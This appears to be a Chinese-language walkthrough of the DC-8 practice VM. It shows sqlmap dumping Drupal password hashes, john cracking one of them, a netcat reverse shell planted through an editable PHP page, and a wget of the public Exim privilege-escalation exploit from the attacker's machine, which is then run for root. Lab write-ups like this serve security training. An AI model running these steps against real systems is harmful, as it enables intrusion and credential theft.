标签:DC8 渗透 192.168 提权 sh exp 靶机 1.111
文章目录
环境版本:
- VMware pro 16
- Kali 2021.1(虚拟机)
- DC-8(虚拟机)
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip 为192.168.1.111
2.端口扫描
nmap -A -p- 192.168.1.111
发现其开启了 22 ssh、80 web服务 drupal cms
二、漏洞挖掘、利用
1.访问靶机 web 服务
对其进行信息收集(遍历网页)
在点击 welcome to dc-8 后发现 url 带了 nid 尝试 SQLmap 梭
2.使用 SQLmap 进行爆内容
sqlmap -u http://192.168.1.111/?nid=1 --dbs
sqlmap -u http://192.168.1.111/?nid=1 -D d7db --tables
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users -C uid,name,pass --dump
3.使用 john 进行爆破 hash
1)将 pass 内容每行一个保存到 DC7-pass.txt
2)进行爆破
john ./DC7-pass.txt
只爆破出 1 个,测试得知其为 john 账号密码
john turtle
4.目录扫描
进行目录扫描查找入口点
nikto -h 192.168.1.111
5.登陆后台进行查找可编辑 PHP 页面
插入 nc 连接
6.获取 shell
1)靶机监听
nc -lvvp 9999
2)提交表单页面执行 php 代码进行触发
得到靶机 shell
三、提权
1.尝试 suid 提权
find / -perm -u=s -type f 2>/dev/null
发现 exim4
2.使用 python 获得交互式 shell
python -c "import pty;pty.spawn('/bin/sh')"
3.尝试使用 exim4 进行提权
1)查看版本信息
exim4 --version
2)在 kali 中搜索相关漏洞
searchsploit exim 4
使用
Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh
查看 exp 其内容
cd /usr/share/exploitdb/exploits/linux/local
cat 46996.sh
发现两种执行方式,这里我们使用第二种
3)将 exp 复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/Desktop/exp.sh
4)查看 exp 格式
vim ./exp.sh
:set ff #查看文件格式
:set ff=unix #更改文件格式
5)使用 python 打开 http 服务进行传输文件
cd /root/Desktop
python -m SimpleHTTPServer 8888
6)靶机 shell 使用 wget 获取文件、利用
cd /tmp #进入tmp目录,我们使用的exp需要写权限,tmp目录所有用户权限均为7
wget http://192.168.1.123:8888/exp.sh #使用wget获取exp
chmod 777 ./exp.sh #增加权限
./exp.sh -m netcat #使用脚本
得到权限
cat /root/flag.txt
标签:DC8,渗透,192.168,提权,sh,exp,靶机,1.111 来源: https://blog.csdn.net/Huangshanyoumu/article/details/115800380
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。